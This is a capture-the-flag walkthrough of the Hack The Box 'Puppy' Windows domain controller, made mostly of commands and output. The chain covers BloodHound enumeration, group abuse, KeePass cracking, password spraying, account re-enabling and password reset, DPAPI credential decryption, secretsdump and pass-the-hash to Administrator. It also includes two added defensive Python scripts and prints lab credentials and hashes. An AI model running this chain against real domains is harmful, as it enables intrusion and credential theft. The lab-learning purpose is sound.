Enum

$ rustscan --ulimit 10000 -a 10.129.222.139 -- -sCTV -Pn
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-`
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
RustScan: Because guessing isn't hacking.
 
[~] Automatically increasing ulimit value to 10000.
Open 10.129.222.139:53
Open 10.129.222.139:88
Open 10.129.222.139:111
Open 10.129.222.139:135
Open 10.129.222.139:139
Open 10.129.222.139:389
Open 10.129.222.139:445
Open 10.129.222.139:464
Open 10.129.222.139:593
Open 10.129.222.139:636
Open 10.129.222.139:3260
Open 10.129.222.139:3268
Open 10.129.222.139:3269
Open 10.129.222.139:5985
Open 10.129.222.139:9389
Open 10.129.222.139:49664
Open 10.129.222.139:49667
Open 10.129.222.139:49669
Open 10.129.222.139:49670
Open 10.129.222.139:49685
Open 10.129.222.139:52113
Open 10.129.222.139:52128
 
*snip*
PORT      STATE SERVICE       REASON  VERSION
53/tcp    open  domain        syn-ack Simple DNS Plus
88/tcp    open  kerberos-sec  syn-ack Microsoft Windows Kerberos (server time: 2025-05-18 15:42:44Z)
111/tcp   open  rpcbind?      syn-ack
135/tcp   open  msrpc         syn-ack Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack Microsoft Windows netbios-ssn
389/tcp   open  ldap          syn-ack Microsoft Windows Active Directory LDAP (Domain: PUPPY.HTB0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds? syn-ack
464/tcp   open  kpasswd5?     syn-ack
593/tcp   open  ncacn_http    syn-ack Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped    syn-ack
2049/tcp  open  rpcbind       syn-ack
3260/tcp  open  iscsi?        syn-ack
5985/tcp  open  http          syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
9389/tcp  open  mc-nmf        syn-ack .NET Message Framing
49664/tcp open  msrpc         syn-ack Microsoft Windows RPC
49667/tcp open  msrpc         syn-ack Microsoft Windows RPC
49669/tcp open  msrpc         syn-ack Microsoft Windows RPC
49670/tcp open  ncacn_http    syn-ack Microsoft Windows RPC over HTTP 1.0
49685/tcp open  msrpc         syn-ack Microsoft Windows RPC
52113/tcp open  msrpc         syn-ack Microsoft Windows RPC
52128/tcp open  msrpc         syn-ack Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
 
Host script results:
|_clock-skew: 7h00m26s

Add puppy.htb to /etc/hosts

Fix time skew
$ sudo ntpdate puppy.htb
CLOCK: time stepped by 25226.715086
The SMB port is open, so check the provided credentials
$ crackmapexec smb 10.129.222.139 -u levi.james -p 'KingofAkron2025!' --shares
 
SMB         10.129.222.139   445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:PUPPY.HTB) (signing:True) (SMBv1:False)
SMB         10.129.222.139   445    DC               [+] PUPPY.HTB\levi.james:KingofAkron2025!
SMB         10.129.222.139   445    DC               [+] Enumerated shares
SMB         10.129.222.139   445    DC               Share           Permissions     Remark
SMB         10.129.222.139   445    DC               -----           -----------     ------
SMB         10.129.222.139   445    DC               ADMIN$                          Remote Admin
SMB         10.129.222.139   445    DC               C$                              Default share
SMB         10.129.222.139   445    DC               DEV                             DEV-SHARE for PUPPY-DEVS
SMB         10.129.222.139   445    DC               IPC$            READ            Remote IPC
SMB         10.129.222.139   445    DC               NETLOGON        READ            Logon server share
SMB         10.129.222.139   445    DC               SYSVOL          READ            Logon server share
Nothing useful, and we do not have read access to /DEV, which looks interesting
$ smbclient -U "PUPPY.HTB\\levi.james" //10.129.222.139/DEV
 
Password for [PUPPY.HTB\levi.james]: 'KingofAkron2025!'
Try "help" to get a list of possible commands.
 
smb: \> ls
NT_STATUS_ACCESS_DENIED listing \*

Release the hounds for more information (netexec works pretty well)

$ nxc ldap puppy.htb -u levi.james -p 'KingofAkron2025!' --bloodhound --collection All --dns-server 10.129.222.139
 
SMB         10.129.222.139   445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:PUPPY.HTB) (signing:True) (SMBv1:False)
LDAP        10.129.222.139   389    DC               [+] PUPPY.HTB\levi.james:KingofAkron2025!
LDAP        10.129.222.139   389    DC               Resolved collection methods: trusts, container, rdp, localadmin, dcom, group, session, psremote, acl, objectprops
LDAP        10.129.222.139   389    DC               Done in 00M 10S
LDAP        10.129.222.139   389    DC               Compressing output into /home/nerd/.nxc/logs/DC_10.129.222.139_*_bloodhound.zip
 
$ mv /path/to/*.zip hound.zip
Load into BloodHound

HR has GenericWrite over Developers (maybe its members can then read the SMB share?)

Add Levi to the Developers group and access /DEV

$ bloodyAD -d puppy.htb -u levi.james -p 'KingofAkron2025!' --host puppy.htb add groupMember Developers levi.james
 
[+] levi.james added to DEVELOPERS
 
$ smbclient //puppy.htb/DEV -U levi.james 'KingofAkron2025!'
 
Try "help" to get a list of possible commands.
smb: \> ls
  .                                  DR        0  Sun Mar 23 03:07:57 2025
  ..                                  D        0  Sat Mar  8 11:52:57 2025
  KeePassXC-2.7.9-Win64.msi           A 34394112  Sun Mar 23 03:09:12 2025
  Projects                            D        0  Sat Mar  8 11:53:36 2025
  recovery.kdbx                       A     2677  Tue Mar 11 22:25:46 2025
 
		5080575 blocks of size 4096. 1514716 blocks available
 
smb: \> get recovery.kdbx
getting file \recovery.kdbx of size 2677 as recovery.kdbx (13.6 KiloBytes/sec) (average 13.6 KiloBytes/sec)

User

This is a KeePass file we can attempt to open, but it needs a password

We do not know the password, so we need to crack it. keepass2john is outdated, but we can use keepass4brute

$ curl -L -o keepass4brute.sh https://raw.githubusercontent.com/r3nt0n/keepass4brute/master/keepass4brute.sh
 
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100  2820  100  2820    0     0  28635      0 --:--:-- --:--:-- --:--:-- 28775
 
$ chmod +x keepass4brute.sh
$ ./keepass4brute.sh recovery.kdbx /usr/share/wordlists/rockyou.txt
 
keepass4brute 1.3 by r3nt0n
https://github.com/r3nt0n/keepass4brute
 
[+] Words tested: 36/14344392 - Attempts per minute: 154 - Estimated time remaining: 9 weeks, 1 days
[+] Current attempt: liverpool
 
[*] Password found: liverpool
 
$ keepassxc recovery.kdbx

PW = liverpool

Extract the passwords and create user and password lists based on the relevant BloodHound accounts

$ nano users.txt
 
administrator
ant.edwards
jamie.williams
steph.cooper
steph.cooper_adm
 
$ nano pws.txt
 
HJKL2025!
Antman2025!
JamieLove2025!
ILY2025!
Steve2025!
 
$ crackmapexec smb 10.129.222.139 -u users.txt -p pws.txt --continue-on-success
 
SMB         10.129.222.139  445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:PUPPY.HTB) (signing:True) (SMBv1:False)
SMB         10.129.222.139  445    DC               [-] PUPPY.HTB\levi.james:HJKL2025! STATUS_LOGON_FAILURE
SMB         10.129.222.139  445    DC               [-] PUPPY.HTB\levi.james:Antman2025! STATUS_LOGON_FAILURE
SMB         10.129.222.139  445    DC               [-] PUPPY.HTB\levi.james:JamieLove2025! STATUS_LOGON_FAILURE
SMB         10.129.222.139  445    DC               [-] PUPPY.HTB\levi.james:ILY2025! STATUS_LOGON_FAILURE
SMB         10.129.222.139  445    DC               [-] PUPPY.HTB\levi.james:Steve2025! STATUS_LOGON_FAILURE
SMB         10.129.222.139  445    DC               [-] PUPPY.HTB\ant.edwards:HJKL2025! STATUS_LOGON_FAILURE
 
SMB         10.129.222.139  445    DC               [+] PUPPY.HTB\ant.edwards:Antman2025!
 
SMB         10.129.222.139  445    DC               [-] PUPPY.HTB\ant.edwards:JamieLove2025! STATUS_LOGON_FAILURE
SMB         10.129.222.139  445    DC               [-] PUPPY.HTB\ant.edwards:ILY2025! STATUS_LOGON_FAILURE
SMB         10.129.222.139  445    DC               [-] PUPPY.HTB\ant.edwards:Steve2025! STATUS_LOGON_FAILURE
SMB         10.129.222.139  445    DC               [-] PUPPY.HTB\adam.silver:HJKL2025! STATUS_LOGON_FAILURE
SMB         10.129.222.139  445    DC               [-] PUPPY.HTB\adam.silver:Antman2025! STATUS_LOGON_FAILURE
SMB         10.129.222.139  445    DC               [-] PUPPY.HTB\adam.silver:JamieLove2025! STATUS_LOGON_FAILURE
SMB         10.129.222.139  445    DC               [-] PUPPY.HTB\adam.silver:ILY2025! STATUS_LOGON_FAILURE
SMB         10.129.222.139  445    DC               [-] PUPPY.HTB\adam.silver:Steve2025! STATUS_LOGON_FAILURE
SMB         10.129.222.139  445    DC               [-] PUPPY.HTB\jamie.williams:HJKL2025! STATUS_LOGON_FAILURE
SMB         10.129.222.139  445    DC               [-] PUPPY.HTB\jamie.williams:Antman2025! STATUS_LOGON_FAILURE
SMB         10.129.222.139  445    DC               [-] PUPPY.HTB\jamie.williams:JamieLove2025! STATUS_LOGON_FAILURE
SMB         10.129.222.139  445    DC               [-] PUPPY.HTB\jamie.williams:ILY2025! STATUS_LOGON_FAILURE
SMB         10.129.222.139  445    DC               [-] PUPPY.HTB\jamie.williams:Steve2025! STATUS_LOGON_FAILURE
SMB         10.129.222.139  445    DC               [-] PUPPY.HTB\samuel.blake:HJKL2025! STATUS_LOGON_FAILURE
SMB         10.129.222.139  445    DC               [-] PUPPY.HTB\samuel.blake:Antman2025! STATUS_LOGON_FAILURE
SMB         10.129.222.139  445    DC               [-] PUPPY.HTB\samuel.blake:JamieLove2025! STATUS_LOGON_FAILURE
SMB         10.129.222.139  445    DC               [-] PUPPY.HTB\samuel.blake:ILY2025! STATUS_LOGON_FAILURE
SMB         10.129.222.139  445    DC               [-] PUPPY.HTB\samuel.blake:Steve2025! STATUS_LOGON_FAILURE
SMB         10.129.222.139  445    DC               [-] PUPPY.HTB\steve.tucker:HJKL2025! STATUS_LOGON_FAILURE
SMB         10.129.222.139  445    DC               [-] PUPPY.HTB\steve.tucker:Antman2025! STATUS_LOGON_FAILURE
SMB         10.129.222.139  445    DC               [-] PUPPY.HTB\steve.tucker:JamieLove2025! STATUS_LOGON_FAILURE
SMB         10.129.222.139  445    DC               [-] PUPPY.HTB\steve.tucker:ILY2025! STATUS_LOGON_FAILURE
SMB         10.129.222.139  445    DC               [-] PUPPY.HTB\steve.tucker:Steve2025! STATUS_LOGON_FAILURE
SMB         10.129.222.139  445    DC               [-] PUPPY.HTB\steph.cooper:HJKL2025! STATUS_LOGON_FAILURE
SMB         10.129.222.139  445    DC               [-] PUPPY.HTB\steph.cooper:Antman2025! STATUS_LOGON_FAILURE
SMB         10.129.222.139  445    DC               [-] PUPPY.HTB\steph.cooper:JamieLove2025! STATUS_LOGON_FAILURE
SMB         10.129.222.139  445    DC               [-] PUPPY.HTB\steph.cooper:ILY2025! STATUS_LOGON_FAILURE
SMB         10.129.222.139  445    DC               [-] PUPPY.HTB\steph.cooper:Steve2025! STATUS_LOGON_FAILURE
SMB         10.129.222.139  445    DC               [-] PUPPY.HTB\steph.cooper_adm:HJKL2025! STATUS_LOGON_FAILURE
SMB         10.129.222.139  445    DC               [-] PUPPY.HTB\steph.cooper_adm:Antman2025! STATUS_LOGON_FAILURE
SMB         10.129.222.139  445    DC               [-] PUPPY.HTB\steph.cooper_adm:JamieLove2025! STATUS_LOGON_FAILURE
SMB         10.129.222.139  445    DC               [-] PUPPY.HTB\steph.cooper_adm:ILY2025! STATUS_LOGON_FAILURE
SMB         10.129.222.139  445    DC               [-] PUPPY.HTB\steph.cooper_adm:Steve2025! STATUS_LOGON_FAILURE

ant.edwards : Antman2025!

Enumerate this user in BloodHound to reveal the path

Add dc.puppy.htb to /etc/hosts

GenericAll over Adam.Silver, so let's investigate further for writable properties

First, let's check the Adam.Silver account details
$ ldapsearch -x -H ldap://puppy.htb -D 'ant.edwards@puppy.htb' -w 'Antman2025!' \
  -b 'DC=puppy,DC=htb' "(sAMAccountName=adam.silver)" userAccountControl
 
# extended LDIF
#
# LDAPv3
# base <DC=puppy,DC=htb> with scope subtree
# filter: (sAMAccountName=adam.silver)
# requesting: userAccountControl
#
 
# Adam D. Silver, Users, PUPPY.HTB
dn: CN=Adam D. Silver,CN=Users,DC=PUPPY,DC=HTB
userAccountControl: 66050
 
# search reference
ref: ldap://ForestDnsZones.PUPPY.HTB/DC=ForestDnsZones,DC=PUPPY,DC=HTB
 
# search reference
ref: ldap://DomainDnsZones.PUPPY.HTB/DC=DomainDnsZones,DC=PUPPY,DC=HTB
 
# search reference
ref: ldap://PUPPY.HTB/CN=Configuration,DC=PUPPY,DC=HTB
 
# search result
search: 2
result: 0 Success
 
# numResponses: 5
# numEntries: 1
# numReferences: 3

userAccountControl: 66050
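
The value 66050 is a bit field, and decoding it shows that the account is a normal user whose password never expires and which is currently disabled. The Python below is an added example, not part of the original writeup: it parses the ldapsearch LDIF shown above, decodes the flags, and diffs two values the way a defender would when reviewing a userAccountControl change on an account. Function names are illustrative, and 66048 is derived here as 66050 with ACCOUNTDISABLE cleared.

```python
# userAccountControl bit flags as documented by Microsoft for Active Directory.
UAC_FLAGS = {
    0x0000001: "SCRIPT",
    0x0000002: "ACCOUNTDISABLE",
    0x0000008: "HOMEDIR_REQUIRED",
    0x0000010: "LOCKOUT",
    0x0000020: "PASSWD_NOTREQD",
    0x0000040: "PASSWD_CANT_CHANGE",
    0x0000080: "ENCRYPTED_TEXT_PWD_ALLOWED",
    0x0000100: "TEMP_DUPLICATE_ACCOUNT",
    0x0000200: "NORMAL_ACCOUNT",
    0x0000800: "INTERDOMAIN_TRUST_ACCOUNT",
    0x0001000: "WORKSTATION_TRUST_ACCOUNT",
    0x0002000: "SERVER_TRUST_ACCOUNT",
    0x0010000: "DONT_EXPIRE_PASSWORD",
    0x0020000: "MNS_LOGON_ACCOUNT",
    0x0040000: "SMARTCARD_REQUIRED",
    0x0080000: "TRUSTED_FOR_DELEGATION",
    0x0100000: "NOT_DELEGATED",
    0x0200000: "USE_DES_KEY_ONLY",
    0x0400000: "DONT_REQ_PREAUTH",
    0x0800000: "PASSWORD_EXPIRED",
    0x1000000: "TRUSTED_TO_AUTH_FOR_DELEGATION",
    0x4000000: "PARTIAL_SECRETS_ACCOUNT",
}

# Excerpt of the ldapsearch output shown above.
SAMPLE_LDIF = """\
# Adam D. Silver, Users, PUPPY.HTB
dn: CN=Adam D. Silver,CN=Users,DC=PUPPY,DC=HTB
userAccountControl: 66050

# search reference
ref: ldap://ForestDnsZones.PUPPY.HTB/DC=ForestDnsZones,DC=PUPPY,DC=HTB
"""


def decode_uac(value):
    """Return (flag names ordered by bit, leftover bits with no known name)."""
    names = [name for bit, name in sorted(UAC_FLAGS.items()) if value & bit]
    known = sum(bit for bit in UAC_FLAGS if value & bit)
    return names, value & ~known


def parse_ldif_uac(ldif):
    """Map each entry's dn to its userAccountControl value.

    Handles plain 'dn: ' lines only (no base64 'dn:: ' or folded lines).
    """
    result, dn = {}, None
    for raw in ldif.splitlines():
        line = raw.strip()
        if not line:
            dn = None  # a blank line ends the current LDIF entry
        elif line.startswith("dn: "):
            dn = line[4:]
        elif line.startswith("userAccountControl: ") and dn:
            result[dn] = int(line.split(": ", 1)[1])
    return result


def uac_diff(before, after):
    """Report which flags were cleared and which were set between two values."""
    old, new = set(decode_uac(before)[0]), set(decode_uac(after)[0])
    return {"cleared": sorted(old - new), "set": sorted(new - old)}


if __name__ == "__main__":
    for dn, value in parse_ldif_uac(SAMPLE_LDIF).items():
        names, unknown = decode_uac(value)
        print(f"{dn}: {value} = {' | '.join(names)} (unknown bits: {unknown:#x})")
    # 66048 is derived: 66050 with the ACCOUNTDISABLE bit (0x2) cleared.
    print(uac_diff(66050, 66048))
```
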

Can we activate the account?

$ bloodyAD --host puppy.htb -d puppy.htb -u ant.edwards -p 'Antman2025!' get writable --detail
 
distinguishedName: CN=Anthony J. Edwards,DC=PUPPY,DC=HTB
*snip bc its his account*
 
distinguishedName: CN=Adam D. Silver,CN=Users,DC=PUPPY,DC=HTB
*snip for relevant privesc options*
 
unicodePwd: WRITE
userAccountControl: WRITE

We can activate the account and change its password to a known one

$ bloodyAD --host dc.puppy.htb -d puppy.htb -u 'ant.edwards' -p 'Antman2025!' -k remove uac -f ACCOUNTDISABLE adam.silver
 
[-] ['ACCOUNTDISABLE'] property flags removed from adam.silver's userAccountControl
 
$ bloodyAD -u ant.edwards -p 'Antman2025!' -d puppy.htb --host puppy.htb set password adam.silver 'asdf1234!'
 
[+] Password changed successfully!

Adam.Silver has CanPSRemote, so connect with evil-winrm

$ evil-winrm -i puppy.htb -u adam.silver -p 'asdf1234!' -d puppy.htb
 
*Evil-WinRM* PS C:\Users\adam.silver\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\adam.silver\Desktop> ls
 
    Directory: C:\Users\adam.silver\Desktop
 
Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----         2/28/2025  12:31 PM           2312 Microsoft Edge.lnk
-ar---         5/19/2025  10:59 PM             34 user.txt
 
*Evil-WinRM* PS C:\Users\adam.silver\Desktop> cat user.txt

A cleaner script will eventually deactivate the account, so you may have to reconnect.

Root

*Evil-WinRM* PS C:\> ls
 
    Directory: C:\
 
Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d-----          5/9/2025  10:48 AM                Backups
d-----         5/12/2025   5:21 PM                inetpub
d-----          5/8/2021   1:20 AM                PerfLogs
d-r---          4/4/2025   3:40 PM                Program Files
d-----          5/8/2021   2:40 AM                Program Files (x86)
d-----          3/8/2025   9:00 AM                StorageReports
d-r---          3/8/2025   8:52 AM                Users
d-----         5/13/2025   4:40 PM                Windows
 
*Evil-WinRM* PS C:\> ls Backups
 
    Directory: C:\Backups
 
Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----          3/8/2025   8:22 AM        4639546 site-backup-2024-12-30.zip
 
*Evil-WinRM* PS C:\> download Backups/site-backup-2024-12-30.zip
 
Info: Downloading C:\\Backups/site-backup-2024-12-30.zip to site-backup-2024-12-30.zip
Info: Download successful!

Enumerate files

$ unzip site-backup-2024-12-30.zip
$ cd puppy
$ cat nms-auth-config.xml.bak
 
<?xml version="1.0" encoding="UTF-8"?>
<ldap-config>
    <server>
        <host>DC.PUPPY.HTB</host>
        <port>389</port>
        <base-dn>dc=PUPPY,dc=HTB</base-dn>
        <bind-dn>cn=steph.cooper,dc=puppy,dc=htb</bind-dn>
        <bind-password>ChefSteph2025!</bind-password>
    </server>
    <user-attributes>
        <attribute name="username" ldap-attribute="uid" />
        <attribute name="firstName" ldap-attribute="givenName" />
        <attribute name="lastName" ldap-attribute="sn" />
        <attribute name="email" ldap-attribute="mail" />
    </user-attributes>
    <group-attributes>
        <attribute name="groupName" ldap-attribute="cn" />
        <attribute name="groupMember" ldap-attribute="member" />
    </group-attributes>
    <search-filter>
        <filter>(&(objectClass=person)(uid=%s))</filter>
    </search-filter>
</ldap-config>

steph.cooper : ChefSteph2025!
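
The finding here is a directory bind password stored in clear text inside a backup archive. The Python below is an added example, not part of the original writeup, showing how a defender could sweep backup archives for the same pattern before they land on a readable path. The sample archive, bind DN and password are constructed placeholders, and the scan uses a regex because a config like the one above, with an unescaped `&` in its filter, is rejected by a strict XML parser.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET

# Constructed sample mirroring the structure of nms-auth-config.xml.bak above;
# the host, bind DN and password are placeholders, not values from the page.
SAMPLE_CONFIG = """<?xml version="1.0" encoding="UTF-8"?>
<ldap-config>
    <server>
        <host>dc.example.test</host>
        <bind-dn>cn=svc.example,dc=example,dc=test</bind-dn>
        <bind-password>Example-Passw0rd!</bind-password>
    </server>
    <search-filter>
        <filter>(&(objectClass=person)(uid=%s))</filter>
    </search-filter>
</ldap-config>
"""

BIND_DN = re.compile(r"<bind-dn>\s*(.*?)\s*</bind-dn>", re.S)
BIND_PW = re.compile(r"<bind-password>\s*(.*?)\s*</bind-password>", re.S)


def build_sample_backup():
    """Build an in-memory zip standing in for a site backup (constructed)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("puppy/index.html", "<html><body>site</body></html>")
        zf.writestr("puppy/nms-auth-config.xml.bak", SAMPLE_CONFIG)
    return buf.getvalue()


def is_well_formed(text):
    """True if a strict XML parser accepts the text."""
    try:
        ET.fromstring(text.encode("utf-8"))
        return True
    except ET.ParseError:
        return False


def mask(secret):
    """Keep only the first character so the report does not re-leak the secret."""
    return secret[:1] + "*" * (len(secret) - 1)


def scan_archive(zip_bytes, max_member_size=1_000_000):
    """Return one finding per non-empty <bind-password> element in the archive."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            # Skip directories and oversized members (cheap zip-bomb guard).
            if info.is_dir() or info.file_size > max_member_size:
                continue
            text = zf.read(info).decode("utf-8", errors="replace")
            dn = BIND_DN.search(text)
            for match in BIND_PW.finditer(text):
                secret = match.group(1).strip()
                if not secret:
                    continue  # empty element, nothing stored
                findings.append({
                    "file": info.filename,
                    "bind_dn": dn.group(1) if dn else None,
                    "password_masked": mask(secret),
                })
    return findings


if __name__ == "__main__":
    print("strict XML parse ok:", is_well_formed(SAMPLE_CONFIG))
    for finding in scan_archive(build_sample_backup()):
        print(finding)
```
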

Recall there was also a Steph.Cooper_adm account, so DPAPI credentials may exist

*Evil-WinRM* PS C:\Users\steph.cooper\Desktop> upload SharpDPAPI.exe
 
Data: 94208 bytes of 94208 bytes copied
Info: Upload successful!
 
*Evil-WinRM* PS C:\Users\steph.cooper\Desktop> ./SharpDPAPI.exe credentials /target:C:\Users\steph.cooper\AppData\Local\Microsoft\Credentials
 
  __                 _   _       _ ___
 (_  |_   _. ._ ._  | \ |_) /\  |_) |
 __) | | (_| |  |_) |_/ |  /--\ |  _|_
                |
  v1.4.0
 
[*] Action: User DPAPI Credential Triage
 
[*] Target Credential Folder: C:\Users\steph.cooper\AppData\Local\Microsoft\Credentials
 
Folder       : C:\Users\steph.cooper\AppData\Local\Microsoft\Credentials
 
  CredFile           : DFBE70A7E5CC19A398EBF1B96859CE5D
 
    guidMasterKey    : {556a2412-1275-4ccf-b721-e6a0b4f90407}
    size             : 11068
    flags            : 0x20000000 (CRYPTPROTECT_SYSTEM)
    algHash/algCrypt : 32772 (CALG_SHA) / 26115 (CALG_3DES)
    description      : Local Credential Data
 
    [X] MasterKey GUID not in cache: {556a2412-1275-4ccf-b721-e6a0b4f90407}
 

Manually extract necessary files for offline decryption (need to trim filenames to download in evil-winrm)

*Evil-WinRM* PS C:\Users\steph.cooper> whoami /user
 
USER INFORMATION
-         ------ ----
-a----          3/8/2025   7:40 AM            740 556a2412-1275-4ccf-b721-e6a0b4f90407
 
*Evil-WinRM* PS C:\Users\steph.cooper\Documents> dir -h C:\Users\steph.cooper\AppData\Roaming\Microsoft\Credentials
 
    Directory: C:\Users\steph.cooper\AppData\Roaming\Microsoft\Credentials
 
Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a-hs-          3/8/2025   7:54 AM            414 C8D69EBE9A43E9DEBF6B5FBD48B521B9
 
*Evil-WinRM* PS C:\Users\steph.cooper\Documents> attrib -h -s "C:\Users\steph.cooper\AppData\Roaming\Microsoft\Protect\S-1-5-21-1487982659-1829050783-2281216199-1107\556a2412-1275-4ccf-b721-e6a0b4f90407"
 
*Evil-WinRM* PS C:\Users\steph.cooper\Documents> download "C:\Users\steph.cooper\AppData\Roaming\Microsoft\Protect\S-1-5-21-1487982659-1829050783-2281216199-1107\556a2412-1275-4ccf-b721-e6a0b4f90407"
 
Info: Downloading C:\Users\steph.cooper\AppData\Roaming\Microsoft\Protect\S-1-5-21-1487982659-1829050783-2281216199-1107\556a2412-1275-4ccf-b721-e6a0b4f90407 to 556a2412-1275-4ccf-b721-e6a0b4f90407
 
Info: Download successful!
 
*Evil-WinRM* PS C:\Users\steph.cooper\Documents> attrib -h -s 'C:\Users\steph.cooper\AppData\Roaming\Microsoft\Credentials\C8D69EBE9A43E9DEBF6B5FBD48B521B9'
 
*Evil-WinRM* PS C:\Users\steph.cooper\Documents> download 'C:\Users\steph.cooper\AppData\Roaming\Microsoft\Credentials\C8D69EBE9A43E9DEBF6B5FBD48B521B9'
 
Info: Downloading C:\Users\steph.cooper\AppData\Roaming\Microsoft\Credentials\C8D69EBE9A43E9DEBF6B5FBD48B521B9 to C8D69EBE9A43E9DEBF6B5FBD48B521B9
 
Info: Download successful!

Decrypt with impacket dpapi.py

$ dpapi.py masterkey -file 556a2412-1275-4ccf-b721-e6a0b4f90407 -sid S-1-5-21-1487982659-1829050783-2281216199-1107 -password 'ChefSteph2025!'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
 
[MASTERKEYFILE]
Version     :        2 (2)
Guid        : 556a2412-1275-4ccf-b721-e6a0b4f90407
Flags       :        0 (0)
Policy      : 4ccf1275 (1288639093)
MasterKeyLen: 00000088 (136)
BackupKeyLen: 00000068 (104)
CredHistLen : 00000000 (0)
DomainKeyLen: 00000174 (372)
 
Decrypted key with User Key (MD4 protected)
Decrypted key: 0xd9a570722fbaf7149f9f9d691b0e137b7413c1414c452f9c77d6d8a8ed9efe3ecae990e047debe4ab8cc879e8ba99b31cdb7abad28408d8d9cbfdcaf319e9c84
 
$ dpapi.py credential -file C8D69EBE9A43E9DEBF6B5FBD48B521B9 -key 0xd9a570722fbaf7149f9f9d691b0e137b7413c1414c452f9c77d6d8a8ed9efe3ecae990e047debe4ab8cc879e8ba99b31cdb7abad28408d8d9cbfdcaf319e9c84
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
 
[CREDENTIAL]
LastWritten : 2025-03-08 15:54:29
Flags       : 0x00000030 (CRED_FLAGS_REQUIRE_CONFIRMATION|CRED_FLAGS_WILDCARD_MATCH)
Persist     : 0x00000003 (CRED_PERSIST_ENTERPRISE)
Type        : 0x00000002 (CRED_TYPE_DOMAIN_PASSWORD)
Target      : Domain:target=PUPPY.HTB
Description :
Unknown     :
Username    : steph.cooper_adm
Unknown     : FivethChipOnItsWay2025!

steph.cooper_adm : FivethChipOnItsWay2025!

$ evil-winrm -u 'steph.cooper_adm' -p 'FivethChipOnItsWay2025!' -i puppy.htb
 
*Evil-WinRM* PS C:\Users\steph.cooper_adm\Documents> cat ../../Administrator/Desktop/root.txt
588f40f27753b39d62829f09217b5d39

We can also run secretsdump to get the Administrator hash

$ secretsdump.py PUPPY/steph.cooper_adm:'FivethChipOnItsWay2025!'@dc.puppy.htb
 
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
 
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:bb0edc15e49ceb4120c7bd7e6e65d75b:::
[*] Cleaning up...
 
$ evil-winrm -i puppy.htb -u Administrator -H bb0edc15e49ceb4120c7bd7e6e65d75b
 
*Evil-WinRM* PS C:\Users\Administrator\Documents> cat ../Desktop/root.txt
588f40f27753b39d62829f09217b5d39